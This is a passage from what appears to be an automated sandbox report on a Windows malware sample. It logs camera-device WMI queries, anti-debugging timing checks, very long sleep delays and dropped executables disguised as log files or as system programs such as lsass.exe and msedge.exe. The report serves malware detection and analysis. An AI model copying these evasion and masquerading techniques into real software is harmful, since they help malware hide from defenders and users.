                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                     Source: C:\Users\user\AppData\Local\Temp\explorer.exe System information queried: FirmwareTableInformation
                                     Source: C:\Users\user\AppData\Local\Temp\explorer.exe System information queried: FirmwareTableInformation
                                     Source: C:\Users\user\AppData\Local\Temp\explorer.exe Special instruction interceptor: First address: 14076D2EF instructions rdtsc caused by: RDTSC with Trap Flag (TF)
                                     Source: C:\Users\user\AppData\Local\Temp\explorer.exe Special instruction interceptor: First address: 14076D336 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
                                     Source: C:\Users\user\Desktop\Zn0uX5K1ez.exe Memory allocated: 1AF0000 memory reserve | memory write watch
                                     Source: C:\Users\user\Desktop\Zn0uX5K1ez.exe Memory allocated: 3620000 memory reserve | memory write watch
                                     Source: C:\Users\user\Desktop\Zn0uX5K1ez.exe Memory allocated: 3460000 memory reserve | memory write watch
                                     Source: C:\blockhostnet\msinto.exe Memory allocated: 11F0000 memory reserve | memory write watch
                                     Source: C:\blockhostnet\msinto.exe Memory allocated: 1AF30000 memory reserve | memory write watch
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Memory allocated: 21C0000 memory reserve | memory write watch
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Memory allocated: 1A440000 memory reserve | memory write watch
                                     Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe Memory allocated: 980000 memory reserve | memory write watch
                                     Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe Memory allocated: 1A550000 memory reserve | memory write watch
                                     Source: C:\Recovery\lsass.exe Memory allocated: 17E0000 memory reserve | memory write watch
                                     Source: C:\Recovery\lsass.exe Memory allocated: 1B2A0000 memory reserve | memory write watch
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Memory allocated: 2D50000 memory reserve | memory write watch
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Memory allocated: 1AFF0000 memory reserve | memory write watch
                                     Source: C:\Windows\debug\explorer.exe Memory allocated: 9A0000 memory reserve | memory write watch
                                     Source: C:\Windows\debug\explorer.exe Memory allocated: 1A480000 memory reserve | memory write watch
                                     Source: C:\blockhostnet\msinto.exe Memory allocated: 1320000 memory reserve | memory write watch
                                     Source: C:\blockhostnet\msinto.exe Memory allocated: 1AF90000 memory reserve | memory write watch
                                     Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe Memory allocated: D50000 memory reserve | memory write watch
                                     Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe Memory allocated: 1A820000 memory reserve | memory write watch
                                     Source: C:\Recovery\lsass.exe Memory allocated: FE0000 memory reserve | memory write watch
                                     Source: C:\Recovery\lsass.exe Memory allocated: 1ABA0000 memory reserve | memory write watch
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Memory allocated: D50000 memory reserve | memory write watch
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Memory allocated: 1AC10000 memory reserve | memory write watch
                                     Source: C:\Windows\debug\explorer.exe Memory allocated: 12C0000 memory reserve | memory write watch
                                     Source: C:\Windows\debug\explorer.exe Memory allocated: 1B120000 memory reserve | memory write watch
                                     Source: C:\Users\user\Desktop\Zn0uX5K1ez.exe Thread delayed: delay time: 922337203685477
                                     Source: C:\blockhostnet\msinto.exe Thread delayed: delay time: 922337203685477
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 922337203685477
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 600000
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 599888
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 599763
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 599484
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 598922
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 3600000
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 598531
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 597922
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 597656
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 597031
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 596766
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 596531
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 595906
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 595672
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 595234
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 594969
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 594266
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 593641
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 593188
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 592609
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 592250
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 591375
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 590906
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 590567
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 590047
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 589813
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 589150
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 588844
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 588484
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 587911
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 587563
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 587125
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 586375
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 586047
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 585759
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 585625
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 585466
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 585339
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 585234
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 585122
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 585011
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 584890
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 584750
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 584639
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 584526
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 584279
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 583958
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 583813
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 583688
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 583563
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 583453
                                     Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe Thread delayed: delay time: 922337203685477
                                     Source: C:\Recovery\lsass.exe Thread delayed: delay time: 922337203685477
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 922337203685477
                                     Source: C:\Windows\debug\explorer.exe Thread delayed: delay time: 922337203685477
                                     Source: C:\blockhostnet\msinto.exe Thread delayed: delay time: 922337203685477
                                     Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe Thread delayed: delay time: 922337203685477
                                     Source: C:\Recovery\lsass.exe Thread delayed: delay time: 922337203685477
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Thread delayed: delay time: 922337203685477
                                     Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Window / User API: threadDelayed 8091
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Window / User API: threadDelayed 1498
                                     Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\mFVAeiee.log
                                     Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\iGvrsCDf.log
                                     Source: C:\blockhostnet\msinto.exe Dropped PE file which has not been started: C:\Users\user\Desktop\AEdPygqV.log
                                     Source: C:\blockhostnet\msinto.exe Dropped PE file which has not been started: C:\Users\user\Desktop\SIVCnSke.log
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\kRRssUig.log
                                     Source: C:\blockhostnet\msinto.exe Dropped PE file which has not been started: C:\Users\user\Desktop\JfNMDZUx.log
                                     Source: C:\blockhostnet\msinto.exe Dropped PE file which has not been started: C:\Users\user\Desktop\crpSXvpM.log
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\admBIJoy.log
                                     Source: C:\Users\user\AppData\Local\Temp\svchost.exe Evasive API call chain: GetLocalTime,DecisionNodes
                                     Source: C:\Users\user\Desktop\Zn0uX5K1ez.exe TID: 5916 Thread sleep time: -922337203685477s >= -30000s
                                     Source: C:\blockhostnet\msinto.exe TID: 968 Thread sleep time: -922337203685477s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 1088 Thread sleep time: -30000s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -3689348814741908s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -600000s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -599888s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -599763s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -599484s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -598922s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3380 Thread sleep time: -32400000s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -598531s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -597922s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -597656s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -597031s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -596766s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -596531s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -595906s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -595672s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -595234s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -594969s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -594266s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -593641s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -593188s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -592609s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -592250s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -591375s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -590906s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -590567s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -590047s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -589813s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -589150s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -588844s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -588484s >= -30000s
                                     Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632 Thread sleep time: -587911s >= -30000s
